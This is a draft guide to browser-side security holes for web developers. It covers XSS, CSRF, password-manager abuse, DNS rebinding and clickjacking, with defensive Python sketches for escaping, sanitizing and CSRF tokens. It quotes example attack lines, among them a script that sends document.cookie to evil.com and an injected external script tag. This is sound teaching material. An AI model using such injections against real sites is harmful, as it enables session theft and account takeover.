Security tips for web developers

This page describes some things that web developers need to know about web browsers in order to create sites that don't have security holes.

This is still a draft, as you might be able to guess from the number of "TODO:" items and the poor separation of opinion from fact.

Cross-site scripting (XSS)
Password fields in user-submitted HTML
Cross-site request forgery (CSRF)
Other common holes
Should I disable password manager?
Sites used at public computers
Intranet sites
Purely server-side holes

Cross-site scripting (XSS)

A cross-site scripting (XSS) hole exists when an attacker can inject scripts into a page sent by your server. Browsers treat these injected scripts like any other script in the page.

For example, if http://www.yoursite.com/search?q=<script>alert(5)</script> returns "<p>There were no hits for <script>alert(5)</script>.</p>", your site is vulnerable to a simple XSS hole. If a malicious site links to such a URL, it can take control of the user's account on the site in several ways:

Steal cookies for that site (location = "http://evil.com/stealcookie.cgi?cookie=" + encodeURIComponent(document.cookie)).
Steal passwords for that site that are stored by the browser, or that users are willing to enter after checking that they are on the correct site.
Read the user's data on the site or act on behalf of the user using iframes and DOM.
Set up an interactive session for the attacker to control the user's account, using the user's browser as a proxy, as long as the user doesn't leave the page. (This defeats any security-by-obscurity you might have.)
If the site has another XSS hole that can be exploited through a cookie, a normal XSS hole can be used to set a cookie, resulting in a permanent attack.

Internet Explorer supports a non-standard extension to HTTP cookies called HttpOnly. HttpOnly guards against the first of the attacks listed above (stealing cookies), but only the first (except in some clever cases involving multiple subdomains). Because of this, and because Firefox does not support HttpOnly (bug 178993), you should not rely on HttpOnly to protect your site and visitors.

Even on sites where users do not have accounts, XSS holes can be a problem. For example, intranet sites are automatically limited to users within the intranet, but XSS holes can allow outsiders to access them through the web browsers of employees.

Avoiding XSS holes

"Open redirect" scripts should not redirect to URLs with special protocols that inherit the security context of the site (hi Gmail). In Firefox, these protocols are javascript: and data:.

For sites where the input is meant to be plain text, the fix is simple: escape everything as it is output as HTML, using the escaping mechanism appropriate to the context where it appears.

Text in HTML and HTML attributes: escape & < > " ' as &amp; &lt; &gt; &quot; &#39;
Text in JavaScript strings: escape \ / ' " as \\ \/ \' \". (It is not immediately obvious why you must escape / as \/. The reason lies not in how JavaScript is parsed but in how HTML is parsed: HTML parsers in web browsers treat any </script> as the end of the <script> element, even when it appears inside a JavaScript string.)
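A minimal sketch of the two escaping rules above, in Python (the function names are hypothetical). Python's standard html.escape does the same HTML escaping but writes ' as &#x27;. The JavaScript version covers only the four characters listed above; real code would also need to handle newlines, which are not allowed raw inside a JavaScript string literal.

```python
def escape_html(text: str) -> str:
    """Escape text for HTML element content or a quoted attribute value."""
    # "&" must be replaced first, or the entities added below would be
    # escaped a second time.
    return (text.replace("&", "&amp;")
                .replace("<", "&lt;")
                .replace(">", "&gt;")
                .replace('"', "&quot;")
                .replace("'", "&#39;"))


def escape_js_string(text: str) -> str:
    """Escape text for use inside a quoted JavaScript string literal."""
    # The backslash goes first for the same reason "&" does above.
    # Escaping "/" turns "</script>" into "<\/script>", which the HTML parser
    # no longer sees as the end of the enclosing <script> element.
    return (text.replace("\\", "\\\\")
                .replace("/", "\\/")
                .replace("'", "\\'")
                .replace('"', '\\"'))


query = "<script>alert(5)</script>"
print("<p>There were no hits for " + escape_html(query) + ".</p>")
# prints: <p>There were no hits for &lt;script&gt;alert(5)&lt;/script&gt;.</p>
print("var q = '" + escape_js_string(query) + "';")
# prints: var q = '<script>alert(5)<\/script>';
```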

Your choice of server-side libraries may affect how easy it is to get this right. If your HTML generation is based on concatenating strings and calling functions to escape variables that might contain certain characters, security depends on "remembering to escape" every variable. One alternative is to use an API where you're constructing a DOM tree out of elements and text nodes. Another is to use an API where you're opening tags, giving them attributes, closing tags, and outputting text. If implemented well, these abstractions might make server-side programming easier and improve a site's speed in addition to making the code less error-prone.
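As a rough illustration of the DOM-tree approach, the sketch below uses Python's standard xml.etree.ElementTree as a stand-in for an HTML-generating API (the function name and markup are hypothetical). Text and attribute values are assigned to nodes rather than pasted into a string, so the serializer escapes them and there is nothing to remember.

```python
import xml.etree.ElementTree as ET


def render_no_hits(query: str, retry_url: str) -> str:
    """Build <p>No hits for QUERY. Try <a href=URL>another search</a>.</p>"""
    p = ET.Element("p")
    # Stored as a text node, not as markup; tostring() escapes & < >.
    p.text = "No hits for " + query + ". Try "
    # Attribute values are escaped on output too, including double quotes.
    link = ET.SubElement(p, "a", href=retry_url)
    link.text = "another search"
    link.tail = "."
    return ET.tostring(p, encoding="unicode")


print(render_no_hits("<script>alert(5)</script>", 'x" onclick="evil()'))
```

Escaping does not make the link target itself safe: a javascript: URL passes through unchanged, so the URL restrictions described later on this page still apply.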

To be safe from XSS, sites should also specify the character set of every page. Browsers use all kinds of crazy heuristics to determine the character set when it is not specified, and the inputs to those heuristics are largely under the control of an attacker. For example, browsers may take the character set of the linking page, byte distributions within the page, and the user's language into account. Some character sets (such as UTF-7) have ways of representing the < character without using the byte corresponding to that character in ASCII, which can lead to XSS if a browser thinks your site is UTF-7.
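A minimal sketch of declaring the character set, written as a plain WSGI application (the app and its content are hypothetical). It sets the charset parameter of the Content-Type header, repeats it in a <meta charset> element as a fallback for copies of the page saved without headers, and encodes the body with the same charset it declares.

```python
def app(environ, start_response):
    """Minimal WSGI app that always declares its character set."""
    html = (
        "<!DOCTYPE html>\n"
        '<meta charset="utf-8">\n'  # in-document declaration as a fallback
        "<title>Example</title>\n"
        "<p>Hello</p>\n"
    )
    body = html.encode("utf-8")  # encode with the charset we declare
    start_response("200 OK", [
        # The charset parameter leaves the browser nothing to guess.
        ("Content-Type", "text/html; charset=utf-8"),
        ("Content-Length", str(len(body))),
    ])
    return [body]
```

To try it locally, the standard library's wsgiref.simple_server.make_server("localhost", 8000, app).serve_forever() will serve it.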

Avoiding XSS holes in sites that allow HTML

For sites where users are allowed to use HTML, the goal is not to escape the input, but to restrict what HTML features can be used.

The level of restriction depends on the site. A site like MySpace may decide to let users customize the appearance of their pages as much as they want. In contrast, a forum will probably limit users to P, BLOCKQUOTE, lists, simple inline styles, and perhaps images.

The naive approach of "stripping tags" using regular expressions often misses things because the regular expression interprets the markup differently than browsers do. For example, the regular expression <.*?> matches nothing in "<script src='http://evil.com/evil.js' </script", leaving your Internet Explorer and Firefox visitors vulnerable (see bug 226495 for details about "half-tag" parsing). Gerv has an example involving unterminated entities. RSnake maintains an extensive list of XSS vectors that naive filtering may miss.
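The regular-expression example above is easy to check. This Python sketch (the function name is hypothetical) applies <.*?> the way a naive filter would:

```python
import re


def naive_strip_tags(html: str) -> str:
    # The "naive" filter: delete anything that looks like <...>.
    return re.sub(r"<.*?>", "", html)


payload = "<script src='http://evil.com/evil.js' </script"
# The payload contains no ">", so the pattern never matches and the
# filter returns the input unchanged.
print(naive_strip_tags(payload) == payload)  # prints: True
print(naive_strip_tags("<b>bold</b>"))  # prints: bold
```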

TODO: go through RSnake's list and make sure my advice covers everything.

The best approach is to parse the input HTML on the server, keeping only tags, attributes, and attribute values you want to allow. Upon serialization, the result will be "well-formed" HTML that browsers will parse the same way your server did.
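One way to follow this advice in Python is to let the standard library's html.parser do the parsing and rebuild the output from a whitelist. This is a sketch under stated assumptions, not a vetted sanitizer: the tag list is a hypothetical forum-style whitelist, it drops every attribute rather than whitelisting some, and it discards the contents of <script> and <style>. Because it writes only tags it opened itself and escapes all text, the output is well-formed even when the input is not.

```python
from html import escape
from html.parser import HTMLParser

# Hypothetical forum-style whitelist; adjust for your site.
ALLOWED_TAGS = {"p", "blockquote", "ul", "ol", "li", "b", "i", "em", "strong"}
# Elements whose content is dropped entirely rather than kept as text.
DROP_CONTENT = {"script", "style"}


class WhitelistSanitizer(HTMLParser):
    """Re-serializes only whitelisted tags; all attributes are dropped."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []        # pieces of the sanitized output
        self.open_tags = []  # whitelisted tags currently open, innermost last
        self.dropping = 0    # > 0 while inside <script> or <style>

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag names; attrs (including on* handlers)
        # are never written out.
        if tag in DROP_CONTENT:
            self.dropping += 1
        elif tag in ALLOWED_TAGS:
            self.out.append(f"<{tag}>")
            self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT:
            self.dropping = max(0, self.dropping - 1)
        elif tag in self.open_tags:
            # Close everything opened after this tag so nesting stays valid.
            while self.open_tags:
                inner = self.open_tags.pop()
                self.out.append(f"</{inner}>")
                if inner == tag:
                    break

    def handle_data(self, data):
        # Character references were already decoded, so re-escape all text.
        if not self.dropping:
            self.out.append(escape(data))


def sanitize(untrusted_html: str) -> str:
    parser = WhitelistSanitizer()
    parser.feed(untrusted_html)
    parser.close()
    # Close any whitelisted tags the input left open.
    parser.out.extend(f"</{tag}>" for tag in reversed(parser.open_tags))
    return "".join(parser.out)


print(sanitize('<p onclick="evil()">Hi <script>alert(5)</script><b>there</p>'))
# prints: <p>Hi <b>there</b></p>
```

Comments, doctypes, and tags outside the whitelist simply produce no output, because the parser's default handlers for them do nothing.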

Things you should ensure are never allowed in user-submitted HTML, to protect the accounts of visitors who use Firefox and IE:

javascript:, vbscript:, and data: URLs in links, images, anywhere.
<script> tags, with or without src attributes.
Event attributes (on*), which contain scripts.
-moz-binding: or behavior: CSS properties inside <style> elements or style attributes.
HTML that is not "well-formed": you can't be sure how quirky browsers will parse it. (Example: <b <i>Foo)

The above list might not be complete, and it is safer to use whitelists than blacklists. For example, allow only http:, https:, and ftp: links rather than allowing all links other than javascript:, vbscript:, and data:.
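A whitelist check for link targets might look like this Python sketch (the function name is hypothetical). It assumes the URL has already been extracted by an HTML parser, so character references such as &#58; are already decoded. Browsers ignore leading whitespace and any tabs or newlines inside a URL, so the sketch conservatively removes all whitespace and control characters before reading the scheme. Relative URLs have no scheme and are rejected here.

```python
from urllib.parse import urlsplit

# Whitelist from the text above.
ALLOWED_SCHEMES = {"http", "https", "ftp"}


def is_allowed_link(url: str) -> bool:
    """Return True only if url uses a whitelisted scheme."""
    # Remove whitespace and control characters (code points up to U+0020)
    # everywhere, so "java\tscript:" or " javascript:" cannot hide the real
    # scheme from this check.
    cleaned = "".join(ch for ch in url if ch > " ")
    try:
        # urlsplit() lowercases the scheme; relative URLs get "".
        scheme = urlsplit(cleaned).scheme
    except ValueError:  # e.g. a malformed "[...]" host
        return False
    return scheme in ALLOWED_SCHEMES
```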

If you must allow unsanitized, untrusted HTML to be part of your site, serve those pages from a different hostname than the one where users log in. (Examples: webmail, web hosts, attachments in a bug-tracking system, Google cache.) (See Gerv's proposal.)

TODO: test various browsers' interpretation of setting "document.domain" to figure out exactly what "not on the same hostname" needs to mean

Content other than HTML and XSS

If you serve untrusted content as text/plain, be aware that some browsers will ignore the mime type (violating the HTTP spec) and treat it as something other than text/plain. Internet Explorer notoriously treats text/plain content as HTML if it contains anything that looks like a tag, and even Firefox does some sniffing if some of the bytes would be "control characters" in ASCII. The best solution is to treat untrusted text/plain in the same way as untrusted text/html that cannot be modified: serve it from a different hostname.

TODO: find out whether this warning should also apply to application/octet-stream or other mime types.

TODO: find out what the possible results of Firefox's sniffing are. Can it result in treating the content as text/html, or only as something to be downloaded?

Password fields in user-submitted HTML

Web sites should not allow users to put up forms with <input type="password">. Password managers may fill in the user's saved password, thinking the form is a legitimate part of the site, and the form can then send that password wherever its author chooses.

You can probably check the "type" attribute for "input" elements against your whitelist at the same time you filter for XSS.
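If your filter is built on Python's html.parser, which passes a start tag's attributes to handle_starttag as (name, value) pairs with lowercased names, the check could be a small helper like this hypothetical one, called for every input tag. The whitelist of types is an assumption; it deliberately leaves out password.

```python
# Hypothetical whitelist of <input> types allowed in user-submitted forms.
ALLOWED_INPUT_TYPES = {"text", "checkbox", "radio", "submit"}


def input_type_allowed(attrs) -> bool:
    """attrs: the (name, value) pairs html.parser passes to handle_starttag."""
    # Every "type" attribute must be whitelisted; checking all duplicates
    # avoids depending on which one a browser honours. Values are compared
    # case-insensitively, as browsers do. An <input> with no type attribute
    # is a text field, so all() over no items returns True.
    return all(
        (value or "").lower() in ALLOWED_INPUT_TYPES
        for name, value in attrs
        if name == "type"
    )


print(input_type_allowed([("type", "PASSWORD"), ("name", "pw")]))  # prints: False
```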

The exact likelihood that such an attack will succeed depends on the browser used. Firefox and Safari fill in passwords automatically. IE fills in passwords if the user types his username (imagine a form that says "Type your username to find out your Star Wars name!") or double-clicks the username field and then clicks right below it. Opera fills in passwords if the user clicks the wand icon on the toolbar. Even with Opera, users probably aren't as careful with activating the password manager as they would be when actually typing their password, since password manager does defend against ordinary phishing.

This attack was first used in November 2006 against MySpace, which has since fixed its site. Firefox and Safari developers are trying to determine whether they can mitigate the problem for sites that remain vulnerable, hopefully without crippling password management features and thus making users more vulnerable to actual phishing. (See bug 360493.)

Cross-site request forgery (CSRF)

A cross-site request forgery (CSRF) hole exists when a malicious site can cause a visitor's browser to make a request to your server that causes a change on the server. Because the request comes with the user's cookies, the server assumes the user wanted to submit that form.

Depending on which forms on your site are vulnerable, an attacker might be able to do the following to your victims:

Log the victim out of your site. (On some sites, "Log out" is a link rather than a button!)
Change the victim's site preferences on your site. (Example: Google)
Post a comment on your site using the victim's login.
Transfer funds to another user's account.

Attacks can also be based on the victim's IP address rather than cookies:

Post an anonymous comment that is shown as coming from the victim's IP address.
Modify settings on a device such as a wireless router or cable modem.
Modify an intranet wiki page.
Perform a distributed password-guessing attack without a botnet. (This assumes they have a way to tell whether the login succeeded, perhaps by submitting a second form that isn't protected against CSRF.)

CSRF attacks usually involve JavaScript to submit the cross-site form automatically. It is possible for a malicious site to make a user submit a form to another site even without JavaScript, however: form fields can be hidden and buttons can be disguised as links or scrollbars.

Preventing CSRF

Make sure form submissions that cause server-side changes use your own forms. There are two ways you can do this:

Check the referrer header. If it is not present, or if it does not show the correct URL as the referrer, reject the submission. This has the advantage of being simple and sane, but the disadvantage that users who have told their browsers to omit the referrer header (out of concern for privacy) or lie about the referrer (in order to gain access to porn sites that use the referrer for the wrong purpose) will have trouble. This strategy doesn't work if the form uses GET and the page can contain user-generated content with links.
Include a hidden field in the form and check its value when the form is submitted. A simple scheme is to use an MD5 hash of the login cookie, some information about the form, and a secret on the server. Another possibility is to use a randomly generated one-time key for every form you serve, assuming you have a sufficiently unpredictable source of random numbers. This has the disadvantage of making it unsafe for users to save the HTML for forms and upload them to, say, bug databases.
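Both checks can be sketched in Python. This sketch swaps the MD5 hash for HMAC-SHA256 from the standard hmac module, a keyed hash built for this kind of server-secret construction. The function names, the secret handling, and the URLs in the usage are hypothetical.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

# Hypothetical server secret. A real site would load a fixed value from its
# configuration; generating it at startup invalidates tokens on every restart.
SERVER_SECRET = secrets.token_bytes(32)


def csrf_token(login_cookie: str, form_name: str) -> str:
    """Hidden-field value tied to this user's login cookie and this form."""
    # "\x00" separates the fields so ("ab", "c") and ("a", "bc") differ.
    message = (login_cookie + "\x00" + form_name).encode("utf-8")
    return hmac.new(SERVER_SECRET, message, hashlib.sha256).hexdigest()


def csrf_token_valid(login_cookie: str, form_name: str, submitted: str) -> bool:
    expected = csrf_token(login_cookie, form_name).encode("ascii")
    # compare_digest does not stop at the first differing byte.
    return hmac.compare_digest(expected, submitted.encode("utf-8"))


def referrer_ok(referer, form_page_url: str) -> bool:
    """Reject a missing Referer or one that is not our own form page."""
    if not referer:
        return False
    got, want = urlsplit(referer), urlsplit(form_page_url)
    # Compare scheme, host and path; ignore the query string and fragment.
    return (got.scheme, got.netloc, got.path) == (want.scheme, want.netloc, want.path)
```

The token would be written into the form as a hidden field (for example, a hypothetical <input type="hidden" name="csrf_token" value="...">) and checked with csrf_token_valid when the form is submitted.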

Since so few sites protect their visitors against CSRF attacks, browser makers have discussed possible client-side fixes for CSRF. We didn't come up with anything good. For reference, see bug 38933, bug 40132, bug 246476, and bug 246519. At most, browsers might be able to prevent CSRFs from web sites to intranet sites, but not between web sites.

Other common holes

Don't put private user data or restricted-access data in JavaScript files whose URLs can be guessed. A page on another domain can include such a file with a <script> tag, and the script then runs in the context of the attacker's page, where the attacker's own scripts may be able to observe the data. The only thing keeping most HTML and text files from being read this way is that they result in JavaScript syntax errors. One way to avoid this kind of hole is to serve HTML files containing scripts (to be loaded in hidden iframes) rather than naked scripts.

Example: Bugzilla was vulnerable for a short time when it allowed bug lists to be returned in a JavaScript format (bug 195530). While bug lists do not contain user data, they sometimes include information about restricted-access bug reports.
Example: An early version of Gmail served contact lists as an array literal. Even though the array was not referenced, it was possible to determine the contents of the array by overriding the Array constructor.

Don't load an untrusted site in a frame. The site will be able to load content into other frames, leading to a spoofing attack. If your visitors use Internet Explorer, don't use frames at all, because other sites can replace your site's frames. See bug 246448 for more information.

Don't put passwords (or any data that should remain private) in a URL if the page at that URL contains external links. When users click those links, the entire URL is sent as the referrer. Pages on https sites are not safe either, because links from them to other https sites send the full referrer.

If your site is http://www.amazon.co.uk/, your server should ignore cookies that are set for all of co.uk. This is difficult if you use cookies in client-side JavaScript, but it can be done. Future versions of Firefox will disallow setting cookies for all of "co.uk", just as Firefox already disallows setting cookies for all of "com" (bug 252342).

If your page is designed to be displayed as an iframe on other sites, you may want to specify a background color. If your page is displayed in an <iframe> and does not specify a background color, the background will be transparent, not white (bug 154957).

Even if you protect against traditional CSRF attacks, malicious sites can make users click parts of your site without realizing it. Examples of attacks include sub-reaction-time page changes, pages that load your site in an iframe and cover all but an 8px-by-8px portion of the iframe, and pages that load your site in a 99% transparent iframe. Removing "One-click purchase" buttons helps, but only a little. One possible solution to the attacks involving iframes is to add a script that detects when the page is loaded in a frame and prevents form posting. (This solution should not be confused with the classical "break out of frames" script; it needs to be faster than that.)

If you echo site-relative URLs, be careful not to echo "relative" URLs starting with //. These are interpreted as being relative to the protocol rather than relative to the site. Bugzilla once had a bug where the login form could be made to submit off-site: bug 325079.
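A Python sketch of such a check for a value you are about to echo as a link target, form action, or redirect (the function name is hypothetical). It accepts only paths that start with a single "/". It also rejects "/\", because browsers treat a backslash like a slash in http and https URLs, and it ignores tabs and newlines the way browsers do.

```python
def is_site_relative(url: str) -> bool:
    """True for paths like "/account"; False for "//host" and "/\\host"."""
    # Browsers drop tabs and newlines from URLs, so "/\t/evil.com" is
    # really "//evil.com".
    cleaned = url.replace("\t", "").replace("\n", "").replace("\r", "")
    if not cleaned.startswith("/"):
        return False
    # "//evil.com/x" is protocol-relative and leaves your site; "/\evil.com"
    # is treated the same way by browsers.
    return not cleaned.startswith(("//", "/\\"))
```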

Should I disable password manager?

Financial sites such as banks frequently decide to disable password manager using the autocomplete="off" attribute. I'm not sure why they do this; it seems to me that it hurts security more than it helps:

Advantages of letting users save passwords:

Users are more likely to choose passwords that are hard to guess or brute-force rather than easy to remember and type.
If the user encounters a phishing site, they're more likely to notice that something is wrong, since they're not used to having to enter their password.

Disadvantages of letting users save passwords:

A stolen laptop or a computer sold on eBay is more likely to contain a saved password.

Sites used at public computers

After users log out, encourage them to close the browser window.

To prevent the back button from reaching private pages after the user has logged out of your site (but not closed the window), use the Cache-Control header. This will piss off your users, because it prevents the browser from going Back quickly and makes some browsers forget form information upon going Back. Note that the titles of pages in session history will still be visible in the Back button drop-down.
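A minimal sketch of that advice as WSGI middleware (the no_store name is hypothetical). The text above only says to use Cache-Control; this sketch assumes the no-store directive, which asks the browser not to keep a copy of the response, and it replaces any Cache-Control header the wrapped application set. Given the cost to the Back button, it would be applied only to pages that show private data.

```python
def no_store(app):
    """WSGI middleware: mark every response from app as Cache-Control: no-store."""
    def wrapped(environ, start_response):
        def start(status, headers, exc_info=None):
            # Drop any Cache-Control the app chose, then add ours.
            headers = [(k, v) for k, v in headers if k.lower() != "cache-control"]
            headers.append(("Cache-Control", "no-store"))
            return start_response(status, headers, exc_info)
        return app(environ, start)
    return wrapped
```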

For sites that are frequently used at public computers, consider tying the autocomplete attribute to the checkbox in your login form that controls cookie lifetime. (This checkbox is often labeled "Remember me on this computer" or "Don't ask me for my password for 2 weeks"). For example, a script might set the autocomplete attribute to "off" if the password field has received a keypress and the checkbox is unchecked. That way, users at (misconfigured) public computers are unlikely to accidentally save their passwords on the public computer, while home users will be able to use password manager.

Intranet sites

Be aware that the DNS protocol allows bogus.attacker.com to resolve to an attacker's IP one minute and your server's IP the next. The "Princeton attack" takes advantage of this and has the same security impact as XSS. Intranet servers should check the Host header and return "400 Bad Request" if an unrecognized hostname is given, as the HTTP spec suggests but does not require. In addition, intranet firewalls should prevent DNS requests for external hostnames from resolving to internal IP addresses. Similarly, browsers, operating systems, and ISPs should all prevent external hostnames from resolving to 127.0.0.1. (Firefox briefly tried to work around Princeton attacks by caching DNS responses for longer than allowed by the DNS protocol; see bug 149943. It no longer does this; see bug 162871, bug 174590, bug 205726, and bug 223861.)
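The Host header check might look like this WSGI middleware sketch. The names in KNOWN_HOSTS are hypothetical placeholders for the hostnames your intranet server is really reached by. A request sent to bogus.attacker.com after its DNS record starts pointing at your server still carries bogus.attacker.com in its Host header, so it gets a 400 instead of your content.

```python
# Hypothetical names this intranet server is legitimately reached by.
KNOWN_HOSTS = {"wiki.intranet.example", "wiki"}


def require_known_host(app):
    """WSGI middleware: answer 400 Bad Request for unrecognized Host headers."""
    def wrapped(environ, start_response):
        host = environ.get("HTTP_HOST", "")
        # Drop an optional ":port" and compare case-insensitively. A missing
        # Host header yields "" and is rejected too.
        hostname = host.rsplit(":", 1)[0].lower()
        if hostname not in KNOWN_HOSTS:
            body = b"Bad Request: unrecognized host\n"
            start_response("400 Bad Request", [
                ("Content-Type", "text/plain; charset=utf-8"),
                ("Content-Length", str(len(body))),
            ])
            return [body]
        return app(environ, start_response)
    return wrapped
```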

Maintainers of intranet sites should not neglect other security considerations, such as XSS, CSRF, and SQL injection. Firewalls do not prevent malicious sites loaded in users' browsers from trying XSS attacks.

Purely server-side holes

Some security holes in web sites don't involve web browsers at all and are therefore out of scope for this page. Examples include directory traversal, buffer overflows, SQL injection, and forgetting to apply form access controls to both the page with the form and the code that handles the form. The Web Application Security Consortium's Threat Classification enumerates common server-side holes.